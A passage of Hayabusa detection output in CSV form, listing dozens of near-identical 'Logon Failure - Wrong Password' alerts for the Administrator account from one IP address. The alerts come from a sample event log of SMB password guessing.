NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EdRXJJ1RCl8n9bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tnwGNp2ncfcBlFL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iGKEloPpd6CtrSlg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBvHz5iKl0dl97xj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0FPIXCc5FlKMLaL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c7Li2NqHgSIetZka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MuIRFiXBUqrJeMbx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zxJNU05FkPwhcYxj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TWifHaaBiypAGkKi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9VByeO8vHGSOJK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ns12T94itDDRxYxC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8jplFaHgwrWpFY8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fQ9L626fGZQkNC25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HfplQ16d7lsObzki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c30ILHx5sYZCMflg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GMsJKiYmbgbr9wF0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q2hpQI6z68MVBzoW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDgzJjXBnWDSVjdg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0XU5HdsnM0Lvpvq2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjmtkv6JDb4s2WnR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6mBM2WMWlKkQHZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3jo7coI8uS8JCorc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ao6QcPI3nzpNnHi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WkP8vstCEOH9wnUW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzrhcYEue85zhZ8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ivpdjGaxoZOCTxbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIsZXHE4Swkbytiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bdT2bVjtEd6KhQWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RT9Tqp0lf0dd6h9C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xwhlrl2ck1o2qTDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxX2762Fa804981t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O55rRqTo9vgwnYoq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zo7BzxXZDdykOXoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6YGEMcvYtwNJys39 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0xq8et2LwWSgVgk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43EK0cGlZBhWRd5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UBoGMdTjWVVVvifn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcCrPXp3VLObGU6v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zhZguuPimqAruiTu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o6amdSWFFbueCyp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0wRaNXdhMlIY1HX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J8jqrrwWeKZGypW0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LIavw2zakOP4DqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qz7gr4vA633waQ01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2TmHz5POLSNJHm2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DcpOxhy2nnLIEGHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gJxfDgfujy5Um2wa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 217VTq8EbYIDeSXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPfE1m0tsJAJnRt9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OQCfGhvBMSq3PIoa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XBl6JIRetWEnjaVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXJMNnj4LeBIYARt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3sdn9f4xtvcsaHp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DWT0NepMYD29cOwh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DDb7wV6uzj1tat2d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RBcmANUL4a6DFobS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL2swHF9MtnCfnp3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0ZkcAD0IakqSUph | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5HgksdIGukmliZeE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYoLckmmOWCSf4Q2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PTxr8Zkz2y2XwBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3caypkIM2XqoSSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yuQOUzJ6sU5AhARR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SyM3OrjUHub9k23k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vY7SRoWumGQOrljW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iFrO2nUMlfeDLGyc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9B8Gq7d30U8DqdN0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxSPuxpCHgSo1d1a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9elGZ4POExblUCAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XHY9Ig3sqQKNXYqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: voMDzTqYqKpfudKo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8m9SJ1aFpvFqClU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dM84lQYVfHhZmgpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O5FrdBbYXWaqFkeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZxiNMjsd3YfoCNa2 | IP Addr: 192.168.198.149 | AuthPackage: 